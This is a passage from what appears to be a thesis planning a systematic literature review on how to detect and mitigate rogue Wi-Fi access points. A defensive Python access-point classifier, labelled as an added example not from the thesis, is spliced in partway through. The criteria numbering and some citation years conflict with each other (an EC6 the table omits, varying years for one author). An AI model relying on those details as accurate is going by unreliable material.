Administrators and IT departments are having trouble handling RAPs in an efficient and sophisticated manner, since public Wi-Fi is deployed in different environments such as schools, municipalities, organizations, and businesses. There are several techniques to mitigate rogue access points. All proposed techniques have their advantages and disadvantages to consider (Zhang, Hasegawa, Yamaguchi, & Shimada, 2019). This may be overwhelming for network administrators and others in charge of deploying a proper solution in their respective environment. Due to the number of choices and factors that may vary, guidelines are needed.

There is a large risk of users connecting to RAPs. Even though different techniques exist, mitigation is still a challenging task for network administrators, mainly for economic reasons, since certain implementations are expensive, such as the tailor-made equipment necessary to provide a complete WIPS solution. Also, not all techniques can be implemented in every possible scenario, due to several factors. A solution that is effective at detecting RAPs while being inexpensive and possible to implement in different networks is needed (Vanjale & Mane, 2014).

Given the earlier mentions, there is a lack of guidelines for possible solutions, or rather a framework. Development of a framework may help an administrator to select a proper solution depending on specific factors. This is of use to extend the available resources, improve the infrastructure and be an effective and less time-consuming way to mitigate rogue access points. There are no clear directives on what the best practices are in public Wi-Fi networks; existing frameworks only describe the different advantages and disadvantages. A framework that guides network administrators and others towards better public Wi-Fi security is needed.

The framework needs to consider the different environments and scenarios.

3.1 Motivation

Many users make use of WLANs daily even though threats exist. The threats are either that unknown gateways to the network are set up unintentionally, or that access-control lists (ACLs) are bypassed by an employee or a user; but also intentional, malicious threats such as phishing, sniffing, DoS etc. It is simply a question of time until something highly critical will occur.

Wang et al. (2019) mention that about 454 million public Wi-Fi APs will be deployed worldwide by the end of 2020. Many mobile users are not keen to inspect whether the Wi-Fi connection is legitimate in order to avoid connecting to a RAP. Accordingly, about 25% of all existing public Wi-Fi APs were shown to be either rogue devices or APs compromised by a hacker. The main purpose of these is gathering personal information such as user credentials (Wang, et al., 2019).

There are already documented events, such as the incident at the Sochi Olympics in 2014. The incident records that an NBC News reporter proclaimed that his computer got hacked almost instantaneously at the Russian Olympic Village. Similar attacks have also happened at the Rio Olympics, where huge numbers of public Wi-Fi APs were discovered to be stealing personal information from tourists. Now a greater number of warnings are given to tourists visiting places of interest, with advice to enable your firewall and to utilize VPNs (Amir, 2018).


The most common knowledge currently regarding RAP mitigation is that there exist four types, which are unauthorized, improperly configured, phishing and compromised APs. To mitigate them is to monitor and examine the network. Other solutions are on the physical security level, like hiding the AP and Ethernet sockets. Also, MACsec, WIPS and WIDS are proper ways to mitigate and detect such attacks (Ma, Teymorian, & Cheng, 2008).

All the mentioned mitigation techniques come with flaws in one way or another. Since security mechanisms relying on WPA2 are at a loss, a mechanism that does not depend on pre-shared information will be needed. It should also be usable on all sorts of devices.

Research is being done regarding mitigation, but it is wide and broad even though the subject itself is the same. To subdue the problem, a framework or best practice that is applicable in multiple scenarios and environments needs to be developed. The reasoning is that users/clients are unaware of RAPs while professionals are struggling with mitigating and preventing them, and it is a troublesome task to handle. There are several frameworks that one could implement, but only in specific scenarios/environments, and they might require a higher level of understanding of techniques such as changing protocols. Or they could be economically heavy, such as tailored WIPS or WIDS. If one implementation is not possible, another must be found. There is a need for a framework that could give insight and understanding and simplify matters for those in need. It would act as a guide for professionals such as network administrators, system administrators or security officers in need of guidance or assistance to discover newly proposed techniques and solutions that fit their current or soon-to-be-implemented public Wi-Fi network.

3.2 Research goal

The goal of this study is to create a framework applicable to public Wi-Fi networks. The framework will propose different ways to mitigate and handle rogue access points depending on several factors. This will be done with a systematic literature review using earlier work regarding rogue access point mitigation. This summary of research will hopefully shed some light on what software and proposals exist and their best practices in relevant network environments, since RAPs are a challenging problem in public Wi-Fi networks. If patterns exist in the papers to be studied, they will be presented. What solutions are of use, what separates them and what seems most worthwhile depending on the factors?

Furthermore, the research question is:

How can rogue access points be mitigated in general scenarios and environments?


3.3 Previous research

RAPs are a broad and well-researched subject. There are numerous attacks one can perform with the use of RAPs. It is therefore urgent to prevent or detect the rogue AP and eliminate the source, to avoid both the threat and the attacks that might follow.

There are several proposals and techniques regarding detection, prevention, and elimination of RAPs. The solutions may vary from small and simple to large scale installations of network hardware or software, making it hard to choose the most appropriate solution in different circumstances.

Anmulwar et al. (2014) tell how detection of RAPs can be divided into three categories: client side, server side or the hybrid approach. The client side is constrained in comparison to a server-side approach, since a client-side approach makes use of the client's device, such as a smartphone or laptop, which is limited in computation power and resources. A server-side approach instead uses some sort of server as the solution. If the approach is unable to detect a RAP, the client will be unable to refrain from connecting to it. The combination of the two, client side and server side, is called a hybrid. Hybrids prove to provide a valid solution to detect and prevent rogue APs, since involving both a client and a server helps to eliminate the disadvantages of each, or provides redundancy when a failure occurs (Anmulwar, Srivastava, Mahajan, Kumar, & Kumar, 2014).

Samra et al. (2015) inform that RAPs can be categorized into unauthorized AP, phishing AP, improperly configured AP and compromised AP. Further, they point out compromised APs as one of the most threatening categories while being the hardest to detect among the four types. Alotaibi & Elleithy (2016), on the other hand, classify RAPs into four categories which are: Evil Twin, improperly configured, unauthorized and compromised.

Samra et al. (2015) acknowledge how current techniques can be useful to detect different attacks such as Man-In-The-Middle (MiTM), Denial of Service (DoS) and other malicious attacks, but the techniques cannot fit into every scenario. Instead they proposed a solution that relies on the MAC, SSID and signal strength of the access point to help decide whether an AP is legitimate or not. This is performed by filtering: the MAC of every visible AP is matched against a white list. If the investigated AP does not match, it will be dropped. They also take MAC spoofing into account, by passing the packet to an anomaly detection sensor that uses different tools like Ettercap, Wireshark, Snort and an anomaly detection heuristic (payload shifting) to filter unauthorized APs and to detect different attacks. Their proposal can detect ARP spoofing, DDoS and smurf-like attacks.

Alotaibi & Elleithy (2016) propose a solution based on IP traffic. It requires large numbers of sensors for better coverage, but it is automatic, which makes it less time consuming, though still not cost-efficient. As it depends on an AP's signature, such as SSID and MAC, it is weak against signature spoofing, showing it to be inefficient in mitigating RAPs. They applied RF sensing to detect RAPs with a white list of legitimate APs' (LAPs') MAC addresses. All unauthorized APs that do not match the list will be flagged as rogue, leading to large numbers of false positives. With the help of anomaly detection sensors, attacks can be detected and forwarded to the shadow honeypot for validation. The results obtained from this process indicate the false positive and false negative rates, on the basis of which it is decided whether the abnormal AP is a rogue or not. The results are returned to the filtering and detection stage for future detection. This improves the performance by reducing the false positive rate in comparison to the earlier proposed Shadow honeynet solution. The proposed solution is deemed to be useful and automated, but it requires a whitelist of all authorized APs and large numbers of anomaly detection sensors for better coverage. It has also not been tested in real environments.

There are several techniques to detect a RAP; unfortunately they are inefficient and often inaccurate in one way or another. Seemingly, they cannot handle all RAP types that exist. Some of the techniques require active addition to traffic, others require protocol modification (Alotaibi & Elleithy, 2016).

The perfect RAP solution described by Alotaibi & Elleithy (2016) should be able to detect all RAP types that exist. Preferable besides that would be a passive approach, to avoid an increase in network traffic, while also being able to cover a complete WLAN including all possible channels and frequency bands. The solution should avoid using easily spoofed identifiers such as MAC or IP addresses. To increase robustness, higher-layer protocols such as TCP ACK should be avoided, since detection would be negatively affected and such approaches are also ineffective against deauthentication/disassociation RAPs. Approaches that require protocol modification or additional hardware (sensors being the exception) should be avoided, since these solutions become cumbersome, costly and challenging to implement, and can cause incompatibility errors. Further, a solution that is applied on the AP is not eligible, since it would require the task of detection to be shared (Alotaibi & Elleithy, 2016).
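The allow-list filtering on MAC, SSID and signal strength described by Samra et al. and Alotaibi & Elleithy above, together with the known/unknown/rogue categories a WIPS uses (chapter 2), can be combined into a small classifier. The following is an added example, not code from this thesis or from the cited papers; the BSSIDs, SSIDs, channels, signal values and the tolerance are constructed, and it shows why a plain MAC allow-list both misses a spoofed BSSID and over-reports neighbouring networks.

```python
"""Added example (not from the thesis): classify observed APs against an allow-list.

It combines the MAC/SSID/signal-strength filtering of Samra et al. with the
WIPS labels known / unknown / rogue. A neighbouring network with a foreign SSID
is reported as "unknown" rather than "rogue", which is the false-positive
problem Alotaibi & Elleithy raise for plain MAC allow-lists, and a matching
BSSID whose SSID, channel or signal level disagrees with the allow-list is
reported as "suspect", which is what MAC filtering alone would have passed.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Observation:
    """One beacon seen by a monitoring sensor (all values constructed)."""
    bssid: str      # transmitter MAC address
    ssid: str
    channel: int
    rssi: int       # received signal strength at the sensor, in dBm


# Constructed allow-list of legitimate APs: BSSID -> (SSID, channel, expected RSSI)
AUTHORISED = {
    "00:11:22:33:44:01": ("CampusWiFi", 1, -48),
    "00:11:22:33:44:02": ("CampusWiFi", 6, -55),
}
MANAGED_SSIDS = {ssid for ssid, _, _ in AUTHORISED.values()}
RSSI_TOLERANCE_DB = 10  # assumed: larger deviation than this is treated as suspicious


def classify(obs: Observation) -> str:
    """Return 'known', 'suspect', 'rogue' or 'unknown' for a single observation."""
    entry = AUTHORISED.get(obs.bssid.lower())
    if entry is None:
        # Our SSID advertised from a BSSID we do not own: evil-twin candidate.
        if obs.ssid in MANAGED_SSIDS:
            return "rogue"
        # Foreign SSID and foreign BSSID: a neighbour, not necessarily hostile.
        return "unknown"
    ssid, channel, rssi = entry
    # BSSID is on the allow-list but SSID, channel or signal level disagrees:
    # either a spoofed MAC or a misconfigured legitimate AP. Both need review.
    if (obs.ssid != ssid or obs.channel != channel
            or abs(obs.rssi - rssi) > RSSI_TOLERANCE_DB):
        return "suspect"
    return "known"


def classify_scan(observations) -> dict:
    """Classify a whole scan; returns {bssid: label}, keeping the worst label per BSSID."""
    severity = ["known", "unknown", "suspect", "rogue"]
    result = {}
    for obs in observations:
        key = obs.bssid.lower()
        label = classify(obs)
        if key not in result or severity.index(label) > severity.index(result[key]):
            result[key] = label
    return result


# Constructed scan: a legitimate AP, an allow-listed BSSID seen on the wrong
# channel and far weaker (spoofed MAC), an evil twin with its own MAC, a neighbour.
SAMPLE_SCAN = [
    Observation("00:11:22:33:44:01", "CampusWiFi", 1, -50),
    Observation("00:11:22:33:44:02", "CampusWiFi", 11, -82),
    Observation("de:ad:be:ef:00:01", "CampusWiFi", 6, -40),
    Observation("aa:bb:cc:dd:ee:ff", "CoffeeShop", 6, -70),
]

if __name__ == "__main__":
    for bssid, label in classify_scan(SAMPLE_SCAN).items():
        print(f"{bssid}  {label}")
```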

A disadvantage of these works is that the distinct weaknesses in WPA2 are not included, as the research was performed prior to the crack being exposed, making them outdated and not focused on solutions for RAPs in current Wi-Fi networks. Not every RAP mitigation technique is practical for every scenario a network administrator faces either; each technique and solution comes with its own advantages and disadvantages.


4. Method

The report aims to summarize and conclude earlier research regarding Rogue Access Points in order to develop a framework. This includes matters such as mitigation techniques and guidelines. The goal is to disentangle confusion and disarray regarding the subject. Since most articles regarding RAPs are proposals and not solutions, one must assemble all viable information and look for patterns, with the aim of making "refreshed" and proper guidelines. This report is of importance since the threat of RAPs is a subtopic of, yet a great menace within, the subject of wireless network security.

Scientific research involves problem solving through a controlled and systematic knowledge search (Carlsson, 1990). To perform this study, an appropriate method must be provided.

Since a lot of research already exists on the subject, a literature review seems appropriate.

According to Backman (2018) a literature review is highly dependent on earlier research.

With a large amount of information, the literature review will most likely gather information of relevance to conclude and summarize viably. A literature review, according to Kitchenham (2004), aims to identify, evaluate and interpret the available research of relevance with regard to a specific research question, topic, phenomenon or case of interest. This motivates a literature review as appropriate, due to the large amount of available research.

Kitchenham (2014) also points out that systematic reviews are a given choice for summarizing the existing empirical evidence about a technology. They can also identify gaps in the current research to suggest new areas to investigate or revisit.

Backman (2014) tells that a problem with literature reviews is that they are time consuming and will be of no use if the study is not conducted with thoroughness and fairness in mind. But if a literature review is performed well and with the proper knowledge about method and subject, breakthroughs for the public will most likely occur.

Kitchenham (2014) argues that the disadvantage relates to traditional reviews that lack clear procedures and fail to generate any substantial scientific value. Systematic reviews make it possible for readers to determine and evaluate the research and its impartiality. A proper systematic literature review will most likely generate high regard for its objectivity.

Friberg (2017) mentions that a literature review takes all the current research to gain a deeper knowledge to both understand the problem but also to find conclusions. The review is also helpful to criticize already performed research.

Earlier literature reviews by Alotaibi & Elleithy (2016), Samra et al. (2015) and Lennartsson (2019) have been used as inspiration. This helps the study to firmly follow and learn from that research in order to enhance it. Instead of blindly diving in and relying on the author's own experiences, this will hopefully be an advantage for making a better review.

4.1 Structured Literature Review

Kumar (2011) recommends that a research study have a clear and visible approach, such as a list or model. The reasoning is that this guides the research study to completion. He also points out that it is advisable to have a guideline or frame to meet timelines and to put pressure on the researcher, in a structured way, to reach the research objectives.

Fink (2020) explicitly points out the importance of a systematic literature review following a specific and precise research question. This is to prevent being flooded with somewhat related but not exactly relevant articles. Putting time and focus on a well-developed and precise research question is an important step in conducting a literature review.

A structured literature review can be divided into three important phases according to Kitchenham (2014), which are planning, conducting and reporting the review, while Paré and Kitsiou (2017) say that a structured literature review should follow six steps, as follows:

1. Formulate a research question or aim
2. Perform literature searches
3. Apply inclusion and exclusion criteria
4. Perform quality assessment
5. Extract data
6. Analyse data

These six steps represent how the study will be conducted and followed. But the planning step from Kitchenham (2014) will be included, mainly to ensure that the second step from Paré and Kitsiou (2017) is put to optimal use. The first step, formulating a research question or aim, is performed in chapter 3.2, which leads to the next step, performing literature searches; but before those can be executed they must be planned.

Kitchenham (2014) emphasises the importance of a clearly defined search strategy for a systematic literature review. This helps the reader to easily judge the conducted research. To avoid biased article selection and to let readers follow and understand the conducted study, the search strategy must be transparent and replicable. Documenting the different steps well is therefore important.

Jesson, Matheson & Lacey (2011) mention the importance of continuous documentation. It not only helps the reader but also the researcher. Keeping track of the progress and adjustments of the study helps the researcher if uncertainties about previous steps occur.

Once the research question or aim is defined, literature searches should be performed. But before that, several matters need to be decided by planning the literature searches, as mentioned earlier. Planning will include how the literature search should be performed, what resources will be utilized, and the predefined criteria that need to be established to avoid biased selection processes.

4.1.1 Indexing Services

Backman (2014) recommends the use of electronic resources for literature reviews, arguing the benefits of saving time as well as economic costs. Furthermore, a recommendation is to not settle for a single source of information, especially in a literature review.

Brereton et al. (2007) point out that acquiring information for a study should not be done from one single resource. Instead, several resources should be used to support an unbiased view.

As recommended, index services in the form of databases will be utilized in acquiring articles for the thesis. The University of Skövde currently supplies 78 databases, accessible with the school login. Some delimitations must be given. Free access is of great use, as some databases require a fee for certain articles depending on different variables, so avoiding the cost of articles is of importance. Also, Brereton et al. (2007) recommend IEEExplore, ACM Digital Library and ScienceDirect for acquiring information in matters of information technology.

Backman (2014) recommends the database ScienceDirect for IT or technological studies. There is also reason to utilize Google Scholar, but it is described more as unknown territory. Mark (2016) explains that Google Scholar is a doubtful resource to use, because its open inclusiveness lets anything that can be mistaken for an article be included. Furthermore, the citations are automated, and the profiles are made by the scholars themselves. Several resources are recommended, and according to the earlier mentions, the following databases will be used in this thesis:

➢ ACM Digital Library

➢ IEEExplore

➢ ScienceDirect

4.1.2 Acquiring articles

Backman (2014) explains how scientific communication can be written or spoken, and informal or formal. For example, an informal spoken communication can be a conference, which later becomes formal written communication. It is important to remain critical and unbiased towards what is acquired. In a literature review, formal written communication is mainly of interest. Since databases have been chosen as the search method, formal written communication is accessible.

It is also important to construct proper search terms for acquiring the articles. This is a core step in acquiring articles and conducting a systematic literature review (Jesson, 2017). With this explained, the search terms used in this thesis must be carefully developed and remain unbiased, without any search term favouring the researcher. It is of utmost importance to keep the keywords in the search terms relevant. If this is not the case, the study might be invalid because of the irrelevant articles reviewed, and a faulty conclusion or hypothesis might be reached. Backman (2014) points out the importance for the researcher of making good use of given knowledge. Wohlin, Runeson, Ohlsson, Regnell & Wesslén (2012) carefully discuss that finding the relevant studies without getting swamped by the number of irrelevant studies is a troublesome task if not kept in mind. This clarifies that search terms must be targeted to the thesis, keeping in mind the time limits and the resources at disposal. The researcher will review all studies alone, and they will in most cases be examined manually. This consumes a large amount of time.

It is highly recommended to utilize the resources available from the university.

As Backman (2014) further explains, all resources should be used. This includes modifying and developing the search procedure with boolean operators; depending on the database these could be OR or AND, but it is important to check, for the database in use, which search syntax is appropriate, so that the search term is of the same kind in all databases. This should be performed as thoroughly as possible. Kitchenham (2014) also notes that boolean inclusions/exclusions are a great start for a refined and well-performed search.


Brereton et al. (2007) also state that databases are in no way developed only for literature reviews. They all have different syntaxes regarding search terms. They further declare the importance of keeping a search term adjusted to each database while searching the same index in all databases used.

This concludes that boolean operators will be used in the search terms with relevant and carefully tested search terms. It appears complex and a threat to the thesis if one single search term is in use. To acquire relevant studies the single complex search term is instead replaced by several divided search terms which will be possible to use in the selected databases.

Hence, following the recommendations from the authors of the methodology books mentioned earlier, and from the previous literature reviews studied by the researcher, testing of search terms was performed. The search terms were carefully tested against the 3 databases that were selected. The most useful search terms tested were:

➢ Mitigate AND RAP

➢ Mitigate AND “Rogue Access Point”

➢ Prevent AND “Rogue Access Point”

➢ Prevent AND RAP

For the possibility for reproduction of this study, exact versions of the search terms will be applied when needed for modification in one or several databases. Since Internet as a source is constantly changing, studies may be removed or added which can cause confusion for the reader when examining the study.

4.1.3 Demarcations

Wohlin et al. (2012) point out that inclusion and exclusion criteria are one of the most important steps. These should be decided before the actual searches are performed, so that the criteria are unbiased. Kitchenham (2014) furthermore declares that studies are suitable for answering the predefined research question if they are approved by the predefined selection criteria. Studies that match the exclusion criteria will be removed from the literature review in this study. The inclusion and exclusion criteria used in this study follow table 1, shown below.


Table 1: Description of predefined selection criteria for study (Author's Own)

Inclusion Criteria

IC1. Peer reviewed
IC2. Written in English
IC3. Publications between years 2017 and 2020
IC4. Relevant to the study
IC5. Publication in journals, conferences, review articles

Exclusion Criteria

EC1. Fails to meet inclusion criteria
EC2. Requires a fee, payment, or additional login process
EC3. Redundant studies
EC4. Profound methodology results, implementation, conclusions and/or results
EC5. Too specific environments

Since studies relating to information technology are generally published in English, no other languages are included. Loyd Sealy Library (2018) explains that peer-reviewed articles must be evaluated by a process that is used to ensure quality. When articles are peer-reviewed, they are more reliable sources of information, as their quality has been ensured. IC1 is therefore a criterion that helps to ensure that only articles of quality are included.

To further enhance the quality of the included articles, only journal and conference publications are used (IC5), since such articles are forced to undergo a peer-review process before being released. This eliminates articles of poor quality and is coherent with IC1, further making sure that articles of good quality are used.

Criterion IC3 defines the time frame of the article publications to be included. Studies that originate earlier than 2017 are considered outdated since WPA2 was cracked, as mentioned in the background and earlier research. As further explained by McGee (2017), WPA2 was announced cracked by the newly discovered attack method KRACK (Key Reinstallation AttaCK), which could break WPA2 encryption. Therefore, solutions from before 2017 are considered unreliable to include. It is seen as more reliable to include solutions that consider WPA2 to be flawed than solutions that expect it to be sufficient.

Following these, there are several exclusion criteria. These criteria are used to further increase quality assurance and validity. EC1 clearly eliminates articles that do not satisfy the earlier mentioned inclusion criteria. EC2 ensures that no exclusive literature is gathered. If there are multiple studies with the same implementation, environment, and results, then there is no need for the redundant studies; applying EC3 will remove such articles. If an article achieves the inclusion criteria, then its methodology, implementation, conclusions, and results are assessed as to whether they are understandable. If they appear profound, incomplete, or abstruse, then EC4 will remove them. The same applies to articles with results that are divergent from similar studies: if these studies do not provide an explanation for such scenarios, EC5 will be applied to eliminate them. This is to ensure that the study is using unbiased information.

To remove studies that utilize specific scenarios or exceptional environments, EC6 can be used. If a study cannot be reproduced, it is deemed less credible and should be avoided as a reference. Also, even though it is not a selection criterion, the number of citations can be used alongside all selection criteria. This would be to reduce the final bibliography. An important note is that this will only be applied if the total number of valid publications is too large for the author to process.

4.2 Analysis

Since the study will be qualitative and will handle large amounts of data, thematic coding is deemed to be appropriate. According to Backman (2014), a qualitative study can be performed on three different levels depending on the research goals. He points out that a thematic qualitative study is the choice when general terms and theories are used to present information as a result. But it is important to note that this can also generalize the study. The researcher is recommended to create categories and even subcategories when possible, to save time and make the literature review more solid. It also forces the researcher to look for strict categories where patterns can be developed.

Furthermore, Braun & Clarke (2008) describe thematic analysis as a method to identify, analyse and report patterns (themes) in data. It organizes and describes data in detail, but it can also go further in depth on different aspects of the research topic (Boyatzis, 1998).

Braun & Clarke (2008) explain thematic analysis as an approach to searching across a data set, which can be a number of interviews, focus groups or texts, driven to find repeated patterns of relevance. The exact form and product of the approach varies; it is important that the form is considered beforehand and reconsidered during the conducted study. The main line is to produce a finished product, perhaps not detailed. It is a method recommended as a solid approach for upcoming and new researchers. Thematic coding is an approach to identify, analyse and find patterns within large amounts of data.

4.2.1 Choice of analysis method

After a method has been applied and practically performed, all the information and data collected with the method needs to be analysed. The analysis of choice is thematic coding.

Thematic coding is described by Braun & Clarke (2006) as a rarely acknowledged but still widely used analytic method. It is an analysis method that is useful for qualitative research such as this study. The reason for this is the flexibility and theoretical freedom that the analysis brings. It is also a recommended approach for researchers to learn and understand qualitative studies, due to the fact that it develops the core skills for other qualitative analyses.


Thematic coding is described further by Braun & Clarke (2006) as a qualitative analysis method that identifies, analyses, and creates patterns (themes) within the collected data.

Themes in the context of thematic coding are highly flexible. The point of themes is to find parts that are important to the research question and that can also create patterns in the collected literature. It is important to note that a theme does not have to be the focus of a data set; it can simply be a few but important sentences, and it does not have to exist in more than one data set. Themes can be a large part of some articles and a lesser part of other articles. Codes, according to Braun & Clarke (2006), are something that describes the data the code is referring to, or a way to refer to the data the code is intended for. Codes are simply a way to divide the collected data and create sections of it. They organize and describe data in richer detail.

Thematic coding is less complex than other analysis methods, but it can also lead to a diverse range of the topic being researched. This can be viewed both as an advantage and as a disadvantage, which Braun & Clarke (2006) say can be prevented by using a certain set of goals or limitations before the study is started. Yet the method is, as mentioned earlier, flexible: if the analysed data becomes quite broad, it can also be helpful, since new discoveries can be made.

Thematic coding tends to be driven by the researcher's theoretical or analytic interest in the area, which gives a more analysis-driven study. Since this study is qualitative and mainly aims to answer the research question from what the analysis of the data yields, rather than to extract exact and exhaustive answers from the data itself, a theoretical thematic coding analysis will be performed. Because the study codes for a specific research question that has already been defined, a theoretical approach is also the better fit (Braun & Clarke, 2006).

4.2.2 Practical analysis procedure

Since themes and patterns in the literature need to be discovered and developed, the first step can be initiated as soon as data collection begins. The theoretical thematic approach recommends engaging with the literature early in order to find and develop patterns and themes, which in turn points to data of interest while the collection is still in progress. This partly saves time, and it also gets the researcher engaged in the study immediately (Braun & Clarke, 2006).

Coding and identification of themes is a large part of the study and needs to be considered throughout the whole process. Finding and developing patterns must be performed from the beginning to the end of the study; it cannot be done only at the beginning or only at the end but, as said, simultaneously with the rest of the process (Braun & Clarke, 2006).

Thematic coding can be divided into six phases. They are not rigid rules and sometimes need to be applied flexibly to fit the research question and the data collected. It is also important to note that these phases form a recursive process: while performing the analysis, one may need to move back and forth between them as suited, and the analysis develops over time. The phases should not be rushed (Braun & Clarke, 2006).


The following phases were implemented to extract the data that is later presented in chapter 5, Results.

• Phase 1: Familiarizing yourself with your data

• Phase 2: Generating initial codes

• Phase 3: Searching for themes

• Phase 4: Reviewing themes

• Phase 5: Defining and naming themes

• Phase 6: Producing the report

These phases define the whole analysis process and are performed recursively, in parallel with the collection of data. As mentioned earlier, this saves time, reduces the amount of work and helps create themes and codes while the literature is being analysed (Braun & Clarke, 2006).

4.3 Ethical Considerations

When a systematic literature review is conducted, the researcher must perform the searches and present the results in an objective manner. A researcher might otherwise highlight aspects that support their own intentions, such as a theory they want to see proven; this is easily done without remaining unbiased and objective (Kitchenham & Charters, 2007). It is also important that publications stay unbiased, since positive results are published far more often than negative results (Kitchenham et al., 2010).

When formulating the selection criteria, it is important to ensure objectivity and to remain unbiased. Primary research is essential to produce original data and insight, but its findings may receive little or no attention depending on how many readers a publication reaches. A literature review can inform about what is already known, what remains undiscovered, and so on. It may be unethical to undertake research without taking previous research into account, and without a review of previous research the need for new primary research cannot be established (Gough, Oliver, & Thomas, 2012).

4.4 Validity

Kvale (2001) explains that qualitative studies are often rejected by the scientific establishment: they are seen as subjective, unreliable and invalid, especially when judged by common validity criteria. Validity, as defined by Kvale (2001), concerns the truth and correctness of a statement. For example, a person can be described as reliable and trustworthy, and an argument can be valid and convincing. It is therefore important to maintain an unbiased and objective study; an argument that rests on faulty reasoning, with no sources to support it, cannot be valid.

Fink (2020) relates validity to the degree to which a measure is appropriate when evaluating research.

Four categories of validity follow from this. They are described by Wohlin et al. (2012), and for each the author explains how the threat to it is mitigated:
